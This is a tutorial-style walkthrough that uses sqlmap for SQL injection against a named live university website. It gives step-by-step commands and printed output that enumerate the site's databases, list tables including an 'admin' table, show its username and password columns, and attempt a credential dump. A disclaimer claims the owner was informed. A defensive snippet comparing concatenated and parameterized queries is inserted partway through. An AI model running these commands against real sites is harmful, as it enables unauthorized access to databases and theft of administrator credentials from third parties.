
SQLMAP for Website Security Researchers

By : Anuj Khandelwal

Warning: Before the testing, the owner of the website was informed, and the vulnerability has now been patched. We do not endorse hacking live websites or testing on live domains without official documentation. Respect your country's legal system; this paper is for educational purposes only, to understand attacks on websites and how to counter them. Any actions performed by readers after reading this paper are their own responsibility; the author accepts no responsibility for your actions.

SQLMAP: SQLMAP is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over back-end database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester, and a broad range of switches ranging from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

Requirements for the Testing:
1. VMware Player
2. BackTrack 5 Linux Operating System
3. Wi-Fi Connection
4. Vulnerable Site to Test

Let's Start the Penetration Testing


Step 1: Our target for the demonstration is "http://www.hu.edu.pk/viewfaculty.php?id=6".

Step 2: Append a single quote to the parameter, i.e. type http://www.hu.edu.pk/viewfaculty.php?id=6' in the URL, to check whether the site is vulnerable. If you get an error such as "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''6'' order by posasc' at line 1" on the website, that means the website is vulnerable.
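The quote test in Step 2 works because the page's query is built by string concatenation, so the extra quote breaks the statement. As an added illustration (not part of the original paper), the following Python/sqlite3 snippet reproduces a concatenated query beside a parameterized one; the faculty table, its column names and its rows are constructed stand-ins, not data from the target site.

```python
import re
import sqlite3

def make_db():
    # Constructed in-memory stand-in for the table behind viewfaculty.php;
    # table name, columns and rows are assumptions, not taken from the page.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE faculty (id INTEGER, name TEXT, pos INTEGER)")
    conn.executemany("INSERT INTO faculty VALUES (?, ?, ?)",
                     [(6, "Alice", 2), (6, "Bob", 1), (12, "Carol", 1)])
    return conn

def view_faculty_vulnerable(conn, id_param):
    # Builds the statement by string concatenation, the pattern the page's
    # error message ("... near ''6'' order by posasc'") points to.
    sql = "SELECT name FROM faculty WHERE id='" + id_param + "' ORDER BY pos ASC"
    return [row[0] for row in conn.execute(sql)]

def view_faculty_safe(conn, id_param):
    # Hardened form: accept only a plain decimal integer, then bind it as a
    # parameter so the value can never change the structure of the statement.
    if not re.fullmatch(r"[0-9]+", id_param):
        raise ValueError("id must be numeric")
    sql = "SELECT name FROM faculty WHERE id=? ORDER BY pos ASC"
    return [row[0] for row in conn.execute(sql, (int(id_param),))]

def probe(func, id_param):
    # Runs one handler against a fresh database and reports either the rows
    # it returned or the error it raised, so both behaviours can be compared.
    conn = make_db()
    try:
        return ("ok", func(conn, id_param))
    except (sqlite3.Error, ValueError) as exc:
        return ("error", str(exc))

if __name__ == "__main__":
    # The normal value works in both; the quoted value (Step 2's test) makes
    # the concatenated query fail with a syntax error and is rejected cleanly
    # by the hardened handler before any SQL is executed.
    for value in ("6", "6'"):
        print(repr(value), probe(view_faculty_vulnerable, value),
              probe(view_faculty_safe, value))
```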

Step 3: Open VMware Player with BackTrack as your virtual machine.

Step 4: Click the terminal button.

The terminal screen will open, as shown in the figure.

Step 5: Type cd /pentest/database/sqlmap and press Enter.

Step 6: Type ls to list the directory contents.

Step 7: To enumerate the databases of the website, run sqlmap with the following command:
python ./sqlmap.py -u www.hu.edu.pk/viewfaculty.php?id=12 --dbs

and sqlmap will start its work.

As you can see, we have found 3 databases:

available databases [3]:
[*] c3results
[*] information_schema
[*] test

Let's see what the first database provides.

Step 8: Now run python ./sqlmap.py -u www.hu.edu.pk/viewfaculty.php?id=12 -D c3results --tables

You will get a list of the tables in the database, such as the following:


+-----------------+
| Havelian        |
| admin           |  <---------- Our Target
| add_list        |
| addmissionfrm   |
| alumani_pinfo   |
| bar             |
| bbafinal        |
| bcomstudents    |
| alumani_jobinfo |
| babscrollnoslip |
| bba             |
| bcomr           |
+-----------------+

Of all these tables we are interested in the "admin" table.

Step 9: Run the command python ./sqlmap.py -u www.hu.edu.pk/viewfaculty.php?id=12 -T admin --columns

By entering this, you would get something like:

+---------+------------------+
| Column  | Type             |
+---------+------------------+
| id      | int(11) unsigned |
| passwrd | varchar(25)      |
| u_name  | varchar(25)      |
+---------+------------------+

Step 10: Run the final command python ./sqlmap.py -u www.hu.edu.pk/viewfaculty.php?id=12 -T admin -U test --dump and press Enter. On another website this would have given us the admin username and password, but on this site the data is entered through FTP. Hence, in this case we do not get to see the username and password.

About the Author
Anuj Khandelwal, Web Security Researcher @ TechDefence Pvt. Ltd. Connect with me: www.facebook.com/anujonthemove
